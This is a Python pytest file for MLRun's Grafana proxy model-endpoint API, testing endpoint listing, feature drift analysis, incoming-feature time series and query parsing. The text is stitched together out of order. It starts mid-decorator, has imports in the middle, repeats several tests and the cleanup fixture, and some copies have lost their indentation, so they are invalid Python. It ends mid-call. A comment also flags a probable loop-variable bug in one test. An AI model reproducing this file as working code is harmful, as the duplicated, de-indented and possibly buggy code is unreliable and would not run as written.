    _is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_overall_feature_analysis(db: Session, client: TestClient):
    """Overall drift analysis returns a single six-column summary row."""
    # Pre-baked KV record; stats fields are JSON-encoded strings as stored by
    # the monitoring pipeline.
    endpoint_data = {
        "timestamp": "2021-02-28 21:02:58.642108",
        "project": TEST_PROJECT,
        "model": "test-model",
        "function": "v2-model-server",
        "tag": "latest",
        "model_class": "ClassifierModel",
        "endpoint_id": "test.test_id",
        "labels": "null",
        "latency_avg_1s": 42427.0,
        "predictions_per_second_count_1s": 141,
        "first_request": "2021-02-28 21:02:58.642108",
        "last_request": "2021-02-28 21:02:58.642108",
        "error_count": 0,
        "feature_names": '["sepal length (cm)", "sepal width (cm)", "petal length (cm)", "petal width (cm)"]',
        "feature_stats": '{"sepal length (cm)": {"count": 30, "mean": 5.946666666666668, "std": 0.8394305678023165, "min": 4.7, "max": 7.9, "hist": [[4, 4, 4, 4, 4, 3, 4, 0, 3, 4, 1, 1, 2, 1, 0, 1, 0, 0, 1, 1], [4.7, 4.86, 5.0200000000000005, 5.18, 5.34, 5.5, 5.66, 5.82, 5.98, 6.140000000000001, 6.300000000000001, 6.46, 6.62, 6.78, 6.94, 7.1, 7.26, 7.42, 7.58, 7.74, 7.9]]}, "sepal width (cm)": {"count": 30, "mean": 3.119999999999999, "std": 0.4088672324766359, "min": 2.2, "max": 3.8, "hist": [[1, 1, 1, 1, 1, 1, 1, 1, 2, 0, 3, 3, 2, 2, 0, 3, 1, 1, 0, 4], [2.2, 2.2800000000000002, 2.3600000000000003, 2.44, 2.52, 2.6, 2.68, 2.7600000000000002, 2.84, 2.92, 3, 3.08, 3.16, 3.24, 3.3200000000000003, 3.4, 3.48, 3.56, 3.6399999999999997, 3.7199999999999998, 3.8]]}, "petal length (cm)": {"count": 30, "mean": 3.863333333333333, "std": 1.8212317418360753, "min": 1.3, "max": 6.7, "hist": [[6, 6, 6, 6, 6, 6, 0, 0, 1, 2, 0, 3, 3, 2, 2, 3, 1, 1, 1, 1], [1.3, 1.57, 1.84, 2.1100000000000003, 2.38, 2.6500000000000004, 2.92, 3.1900000000000004, 3.46, 3.7300000000000004, 4, 4.2700000000000005, 4.54, 4.8100000000000005, 5.08, 5.3500000000000005, 5.62, 5.89, 6.16, 6.430000000000001, 6.7]]}, "petal width (cm)": {"count": 30, "mean": 1.2733333333333334, "std": 0.8291804567674381, "min": 0.1, "max": 2.5, "hist": [[5, 5, 5, 5, 5, 5, 0, 0, 1, 2, 3, 2, 1, 0, 2, 3, 1, 1, 0, 4], [0.1, 0.22, 0.33999999999999997, 0.45999999999999996, 0.58, 0.7, 0.82, 0.94, 1.06, 1.1800000000000002, 1.3, 1.42, 1.54, 1.6600000000000001, 1.78, 1.9, 2.02, 2.14, 2.2600000000000002, 2.38, 2.5]]}}',  # noqa
        "drift_measures": '{"petal width (cm)": {"tvd": 0.4, "hellinger": 0.38143130942893605, "kld": 1.3765624725652992}, "tvd_sum": 1.755886699507389, "tvd_mean": 0.43897167487684724, "hellinger_sum": 1.7802062191831514, "hellinger_mean": 0.44505155479578784, "kld_sum": 9.133613874253776, "kld_mean": 2.283403468563444, "sepal width (cm)": {"tvd": 0.3551724137931034, "hellinger": 0.4024622641158891, "kld": 1.7123635755188409}, "petal length (cm)": {"tvd": 0.445, "hellinger": 0.39975075965755447, "kld": 1.6449612084377268}, "sepal length (cm)": {"tvd": 0.5557142857142856, "hellinger": 0.5965618859807716, "kld": 4.399726617731908}}',  # noqa
    }
    v3io = get_v3io_client(endpoint=config.v3io_api, access_key=_get_access_key())
    v3io.kv.put(
        container="projects",
        table_path=f"{TEST_PROJECT}/model-endpoints/endpoints",
        key="test.test_id",
        attributes=endpoint_data,
    )
    response = client.post(
        url="/api/grafana-proxy/model-endpoints/query",
        headers={"X-V3io-Session-Key": _get_access_key()},
        json={
            "targets": [
                {
                    "target": f"project={TEST_PROJECT};endpoint_id=test.test_id;target_endpoint=overall_feature_analysis"  # noqa
                }
            ]
        },
    )
    assert response.status_code == 200
    response_json = response.json()
    assert len(response_json) == 1
    assert "columns" in response_json[0]
    assert "rows" in response_json[0]
    # A single summary row with six cells — presumably the sum/mean of the
    # tvd / hellinger / kld drift measures; TODO confirm column meanings.
    assert len(response_json[0]["rows"][0]) == 6
def test_parse_query_parameters_failure():
    """_parse_query_parameters must reject malformed request bodies."""
    malformed_bodies = [
        {},  # no 'targets' in body
        {"targets": []},  # no 'target' entries in 'targets'
        {"targets": [{"target": "test"}]},  # query not separated by '='
    ]
    for body in malformed_bodies:
        with pytest.raises(MLRunBadRequestError):
            _parse_query_parameters(body)
def test_parse_query_parameters_success():
    """Well-formed 'key=value' target strings are parsed into a dict."""
    # Single key=value pair.
    single = _parse_query_parameters({"targets": [{"target": "test=some_test"}]})
    assert single["test"] == "some_test"
    # Multiple ';'-separated pairs, with and without a trailing ';'.
    for query in (
        "test=some_test;another_test=some_other_test",
        "test=some_test;another_test=some_other_test;",
    ):
        parsed = _parse_query_parameters({"targets": [{"target": query}]})
        assert parsed["test"] == "some_test"
        assert parsed["another_test"] == "some_other_test"
def test_validate_query_parameters_failure():
    """Missing or unsupported 'target_endpoint' values must be rejected."""
    # No 'target_endpoint' key at all.
    with pytest.raises(MLRunBadRequestError):
        _validate_query_parameters({})
    # 'target_endpoint' present but not in the supported set.
    params = {"target_endpoint": "unsupported_endpoint"}
    with pytest.raises(MLRunBadRequestError):
        _validate_query_parameters(params, {"supported_endpoint"})
def test_validate_query_parameters_success():
    """A supported 'target_endpoint' passes validation without raising."""
    params = {"target_endpoint": "list_endpoints"}
    _validate_query_parameters(params, {"list_endpoints"})
def _get_access_key() -> Optional[str]:
return os.environ.get("V3IO_ACCESS_KEY")
@pytest.fixture(autouse=True)
def cleanup_endpoints(db: Session, client: TestClient):
    """Best-effort wipe of TEST_PROJECT's KV records and TSDB table.

    Autouse fixture with no yield, so the cleanup runs at test *setup*,
    guaranteeing each test starts from an empty store. Skipped entirely when
    the V3IO environment is not configured.
    """
    if not _is_env_params_dont_exist():
        # Resolve the KV (endpoint records) and TSDB (event stream) locations
        # from the store-prefix template used by the monitoring code.
        kv_path = config.model_endpoint_monitoring.store_prefixes.default.format(
            project=TEST_PROJECT, kind=ENDPOINTS
        )
        _, kv_container, kv_path = parse_model_endpoint_store_prefix(kv_path)
        tsdb_path = config.model_endpoint_monitoring.store_prefixes.default.format(
            project=TEST_PROJECT, kind=EVENTS
        )
        _, tsdb_container, tsdb_path = parse_model_endpoint_store_prefix(tsdb_path)
        v3io = get_v3io_client(endpoint=config.v3io_api, access_key=_get_access_key())
        frames = get_frames_client(
            token=_get_access_key(),
            container=tsdb_container,
            address=config.v3io_framesd,
        )
        try:
            # List every record currently in the endpoints KV table; never
            # raise on HTTP errors so a missing table is tolerated.
            all_records = v3io.kv.new_cursor(
                container=kv_container,
                table_path=kv_path,
                raise_for_status=RaiseForStatus.never,
            ).all()
            all_records = [r["__name"] for r in all_records]
            # Cleanup KV
            for record in all_records:
                v3io.kv.delete(
                    container=kv_container,
                    table_path=kv_path,
                    key=record,
                    raise_for_status=RaiseForStatus.never,
                )
        except RuntimeError:
            # Best-effort: ignore listing/deletion failures.
            pass
        try:
            # Cleanup TSDB
            frames.delete(
                backend="tsdb", table=tsdb_path, if_missing=fpb2.IGNORE,
            )
        except CreateError:
            # Table never existed; nothing to delete.
            pass
@pytest.mark.skipif(
    _is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_incoming_features(db: Session, client: TestClient):
    """Incoming-feature time series are returned as one target per feature."""
    # Resolve and create the TSDB table that feature events are written to.
    path = config.model_endpoint_monitoring.store_prefixes.default.format(
        project=TEST_PROJECT, kind=EVENTS
    )
    _, container, path = parse_model_endpoint_store_prefix(path)
    frames = get_frames_client(
        token=_get_access_key(), container=container, address=config.v3io_framesd,
    )
    frames.create(backend="tsdb", table=path, rate="10/m", if_exists=1)
    start = datetime.utcnow()
    # Register five endpoints, all sharing the same four feature names.
    endpoints = [_mock_random_endpoint() for _ in range(5)]
    for e in endpoints:
        e.spec.feature_names = ["f0", "f1", "f2", "f3"]
    for endpoint in endpoints:
        ModelEndpoints.create_or_patch(_get_access_key(), endpoint)
    # `total`/`count` are accumulated but never asserted on.
    total = 0
    dfs = []
    for i in range(10):
        count = randint(1, 10)
        total += count
        # NOTE(review): `endpoint` here is the leftover loop variable from the
        # create_or_patch loop above, so all 10 rows are written under the
        # LAST endpoint's uid — yet the assertions below expect 10 datapoints
        # for every endpoint. Confirm whether the backend makes this pass or
        # whether this is a latent bug (should likely iterate endpoints).
        data = {
            "f0": i,
            "f1": i + 1,
            "f2": i + 2,
            "f3": i + 3,
            "endpoint_id": endpoint.metadata.uid,
            "timestamp": start - timedelta(minutes=10 - i),
        }
        df = pd.DataFrame(data=[data])
        dfs.append(df)
    frames.write(
        backend="tsdb",
        table=path,
        dfs=dfs,
        index_cols=["timestamp", "endpoint_id"],
    )
    # Query the incoming_features target for each endpoint and verify that
    # every feature series is present with all 10 datapoints.
    for endpoint in endpoints:
        response = client.post(
            url="/api/grafana-proxy/model-endpoints/query",
            headers={"X-V3io-Session-Key": _get_access_key()},
            json={
                "targets": [
                    {
                        "target": f"project={TEST_PROJECT};endpoint_id={endpoint.metadata.uid};target_endpoint=incoming_features"  # noqa
                    }
                ]
            },
        )
        response = response.json()
        targets = [t["target"] for t in response]
        assert targets == ["f0", "f1", "f2", "f3"]
        lens = [t["datapoints"] for t in response]
        assert all(map(lambda l: len(l) == 10, lens))
import os
from datetime import datetime, timedelta
from random import randint
from typing import Optional
import pandas as pd
import pytest
from fastapi.testclient import TestClient
from pytest import fail
from sqlalchemy.orm import Session
from v3io.dataplane import RaiseForStatus
from v3io_frames import CreateError
from v3io_frames import frames_pb2 as fpb2
from mlrun.api.api.endpoints.grafana_proxy import (
_parse_query_parameters,
_validate_query_parameters,
)
from mlrun.api.crud.model_endpoints import (
ENDPOINTS,
EVENTS,
ModelEndpoints,
write_endpoint_to_kv,
)
from mlrun.config import config
from mlrun.errors import MLRunBadRequestError
from mlrun.utils.model_monitoring import parse_model_endpoint_store_prefix
from mlrun.utils.v3io_clients import get_frames_client, get_v3io_client
from tests.api.api.test_model_endpoints import _mock_random_endpoint
# Environment variables that must all be set for the V3IO-backed tests to run.
ENV_PARAMS = {"V3IO_ACCESS_KEY", "V3IO_API", "V3IO_FRAMESD"}
# Project name under which all test endpoints are created and cleaned up.
TEST_PROJECT = "test3"
def _build_skip_message():
    """Return the skip reason shown when a required V3IO env var is missing."""
    missing = ", ".join(ENV_PARAMS)
    return f"One of the required environment params is not initialized ({missing})"
def _is_env_params_dont_exist() -> bool:
    """Return True when any required V3IO env var is unset (or empty)."""
    # De Morgan of the usual all(...) form: one missing/falsy var is enough.
    return any(not os.environ.get(name, False) for name in ENV_PARAMS)
def test_grafana_proxy_model_endpoints_check_connection(
    db: Session, client: TestClient
):
    """The grafana-proxy health endpoint answers 200 even with a fake key."""
    headers = {"X-V3io-Session-Key": "fake-access-key"}
    result = client.get(url="/api/grafana-proxy/model-endpoints", headers=headers)
    assert result.status_code == 200
@pytest.mark.skipif(
    _is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_list_endpoints(db: Session, client: TestClient):
    """Listing endpoints through the proxy returns one row per stored endpoint."""
    # Seed five active endpoints straight into the KV store.
    mocked_endpoints = [_mock_random_endpoint("active") for _ in range(5)]
    for ep in mocked_endpoints:
        write_endpoint_to_kv(_get_access_key(), ep)
    payload = {
        "targets": [
            {"target": f"project={TEST_PROJECT};target_endpoint=list_endpoints"}
        ]
    }
    response = client.post(
        url="/api/grafana-proxy/model-endpoints/query",
        headers={"X-V3io-Session-Key": _get_access_key()},
        json=payload,
    )
    response_json = response.json()
    if not response_json:
        fail(f"Empty response, expected list of dictionaries. {response_json}")
    response_json = response_json[0]
    if not response_json:
        fail(
            f"Empty dictionary, expected dictionary with 'columns', 'rows' and 'type' fields. {response_json}"
        )
    # Grafana table responses must carry all three of these keys.
    for key in ("columns", "rows", "type"):
        if key not in response_json:
            fail(f"Missing '{key}' key in response dictionary. {response_json}")
    assert len(response_json["rows"]) == 5
@pytest.mark.skipif(
    _is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_individual_feature_analysis(db: Session, client: TestClient):
    """Per-feature analysis returns one row for each of the endpoint's features."""
    # Pre-baked KV record; feature_stats / current_stats / drift_measures are
    # JSON-encoded strings, exactly as the monitoring pipeline stores them.
    endpoint_data = {
        "timestamp": "2021-02-28 21:02:58.642108",
        "project": TEST_PROJECT,
        "model": "test-model",
        "function": "v2-model-server",
        "tag": "latest",
        "model_class": "ClassifierModel",
        "endpoint_id": "test.test_id",
        "labels": "null",
        "latency_avg_1s": 42427.0,
        "predictions_per_second_count_1s": 141,
        "first_request": "2021-02-28 21:02:58.642108",
        "last_request": "2021-02-28 21:02:58.642108",
        "error_count": 0,
        "feature_names": '["sepal length (cm)", "sepal width (cm)", "petal length (cm)", "petal width (cm)"]',
        "feature_stats": '{"sepal length (cm)": {"count": 30, "mean": 5.946666666666668, "std": 0.8394305678023165, "min": 4.7, "max": 7.9, "hist": [[4, 4, 4, 4, 4, 3, 4, 0, 3, 4, 1, 1, 2, 1, 0, 1, 0, 0, 1, 1], [4.7, 4.86, 5.0200000000000005, 5.18, 5.34, 5.5, 5.66, 5.82, 5.98, 6.140000000000001, 6.300000000000001, 6.46, 6.62, 6.78, 6.94, 7.1, 7.26, 7.42, 7.58, 7.74, 7.9]]}, "sepal width (cm)": {"count": 30, "mean": 3.119999999999999, "std": 0.4088672324766359, "min": 2.2, "max": 3.8, "hist": [[1, 1, 1, 1, 1, 1, 1, 1, 2, 0, 3, 3, 2, 2, 0, 3, 1, 1, 0, 4], [2.2, 2.2800000000000002, 2.3600000000000003, 2.44, 2.52, 2.6, 2.68, 2.7600000000000002, 2.84, 2.92, 3, 3.08, 3.16, 3.24, 3.3200000000000003, 3.4, 3.48, 3.56, 3.6399999999999997, 3.7199999999999998, 3.8]]}, "petal length (cm)": {"count": 30, "mean": 3.863333333333333, "std": 1.8212317418360753, "min": 1.3, "max": 6.7, "hist": [[6, 6, 6, 6, 6, 6, 0, 0, 1, 2, 0, 3, 3, 2, 2, 3, 1, 1, 1, 1], [1.3, 1.57, 1.84, 2.1100000000000003, 2.38, 2.6500000000000004, 2.92, 3.1900000000000004, 3.46, 3.7300000000000004, 4, 4.2700000000000005, 4.54, 4.8100000000000005, 5.08, 5.3500000000000005, 5.62, 5.89, 6.16, 6.430000000000001, 6.7]]}, "petal width (cm)": {"count": 30, "mean": 1.2733333333333334, "std": 0.8291804567674381, "min": 0.1, "max": 2.5, "hist": [[5, 5, 5, 5, 5, 5, 0, 0, 1, 2, 3, 2, 1, 0, 2, 3, 1, 1, 0, 4], [0.1, 0.22, 0.33999999999999997, 0.45999999999999996, 0.58, 0.7, 0.82, 0.94, 1.06, 1.1800000000000002, 1.3, 1.42, 1.54, 1.6600000000000001, 1.78, 1.9, 2.02, 2.14, 2.2600000000000002, 2.38, 2.5]]}}',  # noqa
        "current_stats": '{"petal length (cm)": {"count": 100.0, "mean": 2.861, "std": 1.4495485190537463, "min": 1.0, "max": 5.1, "hist": [[4, 20, 20, 4, 2, 0, 0, 0, 0, 1, 0, 2, 3, 2, 8, 7, 6, 10, 7, 4], [1.0, 1.205, 1.41, 1.615, 1.8199999999999998, 2.025, 2.23, 2.4349999999999996, 2.6399999999999997, 2.8449999999999998, 3.05, 3.255, 3.46, 3.665, 3.8699999999999997, 4.074999999999999, 4.279999999999999, 4.484999999999999, 4.6899999999999995, 4.895, 5.1]]}, "petal width (cm)": {"count": 100.0, "mean": 5.471000000000001, "std": 0.6416983463254116, "min": 4.3, "max": 7.0, "hist": [[4, 1, 6, 5, 5, 19, 4, 1, 13, 5, 7, 6, 4, 4, 5, 2, 1, 5, 1, 2], [4.3, 4.435, 4.57, 4.705, 4.84, 4.975, 5.109999999999999, 5.245, 5.38, 5.515, 5.65, 5.785, 5.92, 6.055, 6.1899999999999995, 6.325, 6.46, 6.595, 6.73, 6.865, 7.0]]}, "sepal length (cm)": {"count": 100.0, "mean": 0.7859999999999998, "std": 0.5651530587354012, "min": 0.1, "max": 1.8, "hist": [[5, 29, 7, 7, 1, 1, 0, 0, 0, 0, 7, 3, 5, 0, 13, 7, 10, 3, 1, 1], [0.1, 0.185, 0.27, 0.355, 0.43999999999999995, 0.5249999999999999, 0.61, 0.695, 0.7799999999999999, 0.8649999999999999, 0.9499999999999998, 1.035, 1.12, 1.205, 1.29, 1.375, 1.46, 1.545, 1.63, 1.7149999999999999, 1.8]]}, "sepal width (cm)": {"count": 100.0, "mean": 3.0989999999999998, "std": 0.4787388735948953, "min": 2.0, "max": 4.4, "hist": [[1, 2, 4, 3, 4, 8, 6, 8, 14, 7, 11, 10, 6, 3, 7, 2, 1, 1, 1, 1], [2.0, 2.12, 2.24, 2.3600000000000003, 2.48, 2.6, 2.72, 2.8400000000000003, 2.96, 3.08, 3.2, 3.3200000000000003, 3.4400000000000004, 3.5600000000000005, 3.6800000000000006, 3.8000000000000003, 3.9200000000000004, 4.040000000000001, 4.16, 4.28, 4.4]]}}',  # noqa
        "drift_measures": '{"petal width (cm)": {"tvd": 0.4, "hellinger": 0.38143130942893605, "kld": 1.3765624725652992}, "tvd_sum": 1.755886699507389, "tvd_mean": 0.43897167487684724, "hellinger_sum": 1.7802062191831514, "hellinger_mean": 0.44505155479578784, "kld_sum": 9.133613874253776, "kld_mean": 2.283403468563444, "sepal width (cm)": {"tvd": 0.3551724137931034, "hellinger": 0.4024622641158891, "kld": 1.7123635755188409}, "petal length (cm)": {"tvd": 0.445, "hellinger": 0.39975075965755447, "kld": 1.6449612084377268}, "sepal length (cm)": {"tvd": 0.5557142857142856, "hellinger": 0.5965618859807716, "kld": 4.399726617731908}}',  # noqa
    }
    # Write the record straight into the KV table the proxy reads from.
    v3io = get_v3io_client(endpoint=config.v3io_api, access_key=_get_access_key())
    v3io.kv.put(
        container="projects",
        table_path=f"{TEST_PROJECT}/model-endpoints/endpoints",
        key="test.test_id",
        attributes=endpoint_data,
    )
    response = client.post(
        url="/api/grafana-proxy/model-endpoints/query",
        headers={"X-V3io-Session-Key": _get_access_key()},
        json={
            "targets": [
                {
                    "target": f"project={TEST_PROJECT};endpoint_id=test.test_id;target_endpoint=individual_feature_analysis"  # noqa
                }
            ]
        },
    )
    assert response.status_code == 200
    response_json = response.json()
    assert len(response_json) == 1
    assert "columns" in response_json[0]
    assert "rows" in response_json[0]
    # Four feature names -> four analysis rows.
    assert len(response_json[0]["rows"]) == 4
@pytest.mark.skipif(
    _is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_individual_feature_analysis_missing_field_doesnt_fail(
    db: Session, client: TestClient
):
    """Analysis still succeeds when the record lacks the current_stats field.

    The seeded record deliberately omits "current_stats"; the proxy should
    fill the corresponding row cells with None instead of failing.
    """
    endpoint_data = {
        "timestamp": "2021-02-28 21:02:58.642108",
        "project": TEST_PROJECT,
        "model": "test-model",
        "function": "v2-model-server",
        "tag": "latest",
        "model_class": "ClassifierModel",
        "endpoint_id": "test.test_id",
        "labels": "null",
        "latency_avg_1s": 42427.0,
        "predictions_per_second_count_1s": 141,
        "first_request": "2021-02-28 21:02:58.642108",
        "last_request": "2021-02-28 21:02:58.642108",
        "error_count": 0,
        "feature_names": '["sepal length (cm)", "sepal width (cm)", "petal length (cm)", "petal width (cm)"]',
        "feature_stats": '{"sepal length (cm)": {"count": 30, "mean": 5.946666666666668, "std": 0.8394305678023165, "min": 4.7, "max": 7.9, "hist": [[4, 4, 4, 4, 4, 3, 4, 0, 3, 4, 1, 1, 2, 1, 0, 1, 0, 0, 1, 1], [4.7, 4.86, 5.0200000000000005, 5.18, 5.34, 5.5, 5.66, 5.82, 5.98, 6.140000000000001, 6.300000000000001, 6.46, 6.62, 6.78, 6.94, 7.1, 7.26, 7.42, 7.58, 7.74, 7.9]]}, "sepal width (cm)": {"count": 30, "mean": 3.119999999999999, "std": 0.4088672324766359, "min": 2.2, "max": 3.8, "hist": [[1, 1, 1, 1, 1, 1, 1, 1, 2, 0, 3, 3, 2, 2, 0, 3, 1, 1, 0, 4], [2.2, 2.2800000000000002, 2.3600000000000003, 2.44, 2.52, 2.6, 2.68, 2.7600000000000002, 2.84, 2.92, 3, 3.08, 3.16, 3.24, 3.3200000000000003, 3.4, 3.48, 3.56, 3.6399999999999997, 3.7199999999999998, 3.8]]}, "petal length (cm)": {"count": 30, "mean": 3.863333333333333, "std": 1.8212317418360753, "min": 1.3, "max": 6.7, "hist": [[6, 6, 6, 6, 6, 6, 0, 0, 1, 2, 0, 3, 3, 2, 2, 3, 1, 1, 1, 1], [1.3, 1.57, 1.84, 2.1100000000000003, 2.38, 2.6500000000000004, 2.92, 3.1900000000000004, 3.46, 3.7300000000000004, 4, 4.2700000000000005, 4.54, 4.8100000000000005, 5.08, 5.3500000000000005, 5.62, 5.89, 6.16, 6.430000000000001, 6.7]]}, "petal width (cm)": {"count": 30, "mean": 1.2733333333333334, "std": 0.8291804567674381, "min": 0.1, "max": 2.5, "hist": [[5, 5, 5, 5, 5, 5, 0, 0, 1, 2, 3, 2, 1, 0, 2, 3, 1, 1, 0, 4], [0.1, 0.22, 0.33999999999999997, 0.45999999999999996, 0.58, 0.7, 0.82, 0.94, 1.06, 1.1800000000000002, 1.3, 1.42, 1.54, 1.6600000000000001, 1.78, 1.9, 2.02, 2.14, 2.2600000000000002, 2.38, 2.5]]}}',  # noqa
        "drift_measures": '{"petal width (cm)": {"tvd": 0.4, "hellinger": 0.38143130942893605, "kld": 1.3765624725652992}, "tvd_sum": 1.755886699507389, "tvd_mean": 0.43897167487684724, "hellinger_sum": 1.7802062191831514, "hellinger_mean": 0.44505155479578784, "kld_sum": 9.133613874253776, "kld_mean": 2.283403468563444, "sepal width (cm)": {"tvd": 0.3551724137931034, "hellinger": 0.4024622641158891, "kld": 1.7123635755188409}, "petal length (cm)": {"tvd": 0.445, "hellinger": 0.39975075965755447, "kld": 1.6449612084377268}, "sepal length (cm)": {"tvd": 0.5557142857142856, "hellinger": 0.5965618859807716, "kld": 4.399726617731908}}',  # noqa
    }
    v3io = get_v3io_client(endpoint=config.v3io_api, access_key=_get_access_key())
    v3io.kv.put(
        container="projects",
        table_path=f"{TEST_PROJECT}/model-endpoints/endpoints",
        key="test.test_id",
        attributes=endpoint_data,
    )
    response = client.post(
        url="/api/grafana-proxy/model-endpoints/query",
        headers={"X-V3io-Session-Key": _get_access_key()},
        json={
            "targets": [
                {
                    "target": f"project={TEST_PROJECT};endpoint_id=test.test_id;target_endpoint=individual_feature_analysis"  # noqa
                }
            ]
        },
    )
    assert response.status_code == 200
    response_json = response.json()
    assert len(response_json) == 1
    assert "columns" in response_json[0]
    assert "rows" in response_json[0]
    assert len(response_json[0]["rows"]) == 4
    for row in response_json[0]["rows"]:
        # First cell (feature name) is always populated.
        assert row[0] is not None
        # Cells 1-3 are None — presumably derived from the omitted
        # current_stats field; TODO confirm against the grafana_proxy code.
        assert all(map(lambda e: e is None, row[1:4]))
        # Remaining cells come from the provided feature_stats/drift_measures.
        assert all(map(lambda e: e is not None, row[4:10]))
@pytest.mark.skipif(
    _is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_overall_feature_analysis(db: Session, client: TestClient):
    """Overall drift analysis returns a single six-column summary row."""
    # Pre-baked KV record; stats fields are JSON-encoded strings as stored by
    # the monitoring pipeline.
    endpoint_data = {
        "timestamp": "2021-02-28 21:02:58.642108",
        "project": TEST_PROJECT,
        "model": "test-model",
        "function": "v2-model-server",
        "tag": "latest",
        "model_class": "ClassifierModel",
        "endpoint_id": "test.test_id",
        "labels": "null",
        "latency_avg_1s": 42427.0,
        "predictions_per_second_count_1s": 141,
        "first_request": "2021-02-28 21:02:58.642108",
        "last_request": "2021-02-28 21:02:58.642108",
        "error_count": 0,
        "feature_names": '["sepal length (cm)", "sepal width (cm)", "petal length (cm)", "petal width (cm)"]',
        "feature_stats": '{"sepal length (cm)": {"count": 30, "mean": 5.946666666666668, "std": 0.8394305678023165, "min": 4.7, "max": 7.9, "hist": [[4, 4, 4, 4, 4, 3, 4, 0, 3, 4, 1, 1, 2, 1, 0, 1, 0, 0, 1, 1], [4.7, 4.86, 5.0200000000000005, 5.18, 5.34, 5.5, 5.66, 5.82, 5.98, 6.140000000000001, 6.300000000000001, 6.46, 6.62, 6.78, 6.94, 7.1, 7.26, 7.42, 7.58, 7.74, 7.9]]}, "sepal width (cm)": {"count": 30, "mean": 3.119999999999999, "std": 0.4088672324766359, "min": 2.2, "max": 3.8, "hist": [[1, 1, 1, 1, 1, 1, 1, 1, 2, 0, 3, 3, 2, 2, 0, 3, 1, 1, 0, 4], [2.2, 2.2800000000000002, 2.3600000000000003, 2.44, 2.52, 2.6, 2.68, 2.7600000000000002, 2.84, 2.92, 3, 3.08, 3.16, 3.24, 3.3200000000000003, 3.4, 3.48, 3.56, 3.6399999999999997, 3.7199999999999998, 3.8]]}, "petal length (cm)": {"count": 30, "mean": 3.863333333333333, "std": 1.8212317418360753, "min": 1.3, "max": 6.7, "hist": [[6, 6, 6, 6, 6, 6, 0, 0, 1, 2, 0, 3, 3, 2, 2, 3, 1, 1, 1, 1], [1.3, 1.57, 1.84, 2.1100000000000003, 2.38, 2.6500000000000004, 2.92, 3.1900000000000004, 3.46, 3.7300000000000004, 4, 4.2700000000000005, 4.54, 4.8100000000000005, 5.08, 5.3500000000000005, 5.62, 5.89, 6.16, 6.430000000000001, 6.7]]}, "petal width (cm)": {"count": 30, "mean": 1.2733333333333334, "std": 0.8291804567674381, "min": 0.1, "max": 2.5, "hist": [[5, 5, 5, 5, 5, 5, 0, 0, 1, 2, 3, 2, 1, 0, 2, 3, 1, 1, 0, 4], [0.1, 0.22, 0.33999999999999997, 0.45999999999999996, 0.58, 0.7, 0.82, 0.94, 1.06, 1.1800000000000002, 1.3, 1.42, 1.54, 1.6600000000000001, 1.78, 1.9, 2.02, 2.14, 2.2600000000000002, 2.38, 2.5]]}}',  # noqa
        "drift_measures": '{"petal width (cm)": {"tvd": 0.4, "hellinger": 0.38143130942893605, "kld": 1.3765624725652992}, "tvd_sum": 1.755886699507389, "tvd_mean": 0.43897167487684724, "hellinger_sum": 1.7802062191831514, "hellinger_mean": 0.44505155479578784, "kld_sum": 9.133613874253776, "kld_mean": 2.283403468563444, "sepal width (cm)": {"tvd": 0.3551724137931034, "hellinger": 0.4024622641158891, "kld": 1.7123635755188409}, "petal length (cm)": {"tvd": 0.445, "hellinger": 0.39975075965755447, "kld": 1.6449612084377268}, "sepal length (cm)": {"tvd": 0.5557142857142856, "hellinger": 0.5965618859807716, "kld": 4.399726617731908}}',  # noqa
    }
    v3io = get_v3io_client(endpoint=config.v3io_api, access_key=_get_access_key())
    v3io.kv.put(
        container="projects",
        table_path=f"{TEST_PROJECT}/model-endpoints/endpoints",
        key="test.test_id",
        attributes=endpoint_data,
    )
    response = client.post(
        url="/api/grafana-proxy/model-endpoints/query",
        headers={"X-V3io-Session-Key": _get_access_key()},
        json={
            "targets": [
                {
                    "target": f"project={TEST_PROJECT};endpoint_id=test.test_id;target_endpoint=overall_feature_analysis"  # noqa
                }
            ]
        },
    )
    assert response.status_code == 200
    response_json = response.json()
    assert len(response_json) == 1
    assert "columns" in response_json[0]
    assert "rows" in response_json[0]
    # A single summary row with six cells — presumably the sum/mean of the
    # tvd / hellinger / kld drift measures; TODO confirm column meanings.
    assert len(response_json[0]["rows"][0]) == 6
def test_parse_query_parameters_failure():
# No 'targets' in body
with pytest.raises(MLRunBadRequestError):
_parse_query_parameters({})
# No 'target' list in 'targets' dictionary
with pytest.raises(MLRunBadRequestError):
_parse_query_parameters({"targets": []})
# Target query not separated by equals ('=') char
with pytest.raises(MLRunBadRequestError):
_parse_query_parameters({"targets": [{"target": "test"}]})
def test_parse_query_parameters_success():
# Target query separated by equals ('=') char
params = _parse_query_parameters({"targets": [{"target": "test=some_test"}]})
assert params["test"] == "some_test"
# Target query separated by equals ('=') char (multiple queries)
params = _parse_query_parameters(
{"targets": [{"target": "test=some_test;another_test=some_other_test"}]}
)
assert params["test"] == "some_test"
assert params["another_test"] == "some_other_test"
params = _parse_query_parameters(
{"targets": [{"target": "test=some_test;another_test=some_other_test;"}]}
)
assert params["test"] == "some_test"
assert params["another_test"] == "some_other_test"
def test_validate_query_parameters_failure():
# No 'target_endpoint' in query parameters
with pytest.raises(MLRunBadRequestError):
_validate_query_parameters({})
# target_endpoint unsupported
with pytest.raises(MLRunBadRequestError):
_validate_query_parameters(
{"target_endpoint": "unsupported_endpoint"}, {"supported_endpoint"}
)
def test_validate_query_parameters_success():
_validate_query_parameters(
{"target_endpoint": "list_endpoints"}, {"list_endpoints"}
)
def _get_access_key() -> Optional[str]:
return os.environ.get("V3IO_ACCESS_KEY")
@pytest.fixture(autouse=True)
def cleanup_endpoints(db: Session, client: TestClient):
if not _is_env_params_dont_exist():
kv_path = config.model_endpoint_monitoring.store_prefixes.default.format(
project=TEST_PROJECT, kind=ENDPOINTS
)
_, kv_container, kv_path = parse_model_endpoint_store_prefix(kv_path)
tsdb_path = config.model_endpoint_monitoring.store_prefixes.default.format(
project=TEST_PROJECT, kind=EVENTS
)
_, tsdb_container, tsdb_path = parse_model_endpoint_store_prefix(tsdb_path)
v3io = get_v3io_client(endpoint=config.v3io_api, access_key=_get_access_key())
frames = get_frames_client(
token=_get_access_key(),
container=tsdb_container,
address=config.v3io_framesd,
)
try:
all_records = v3io.kv.new_cursor(
container=kv_container,
table_path=kv_path,
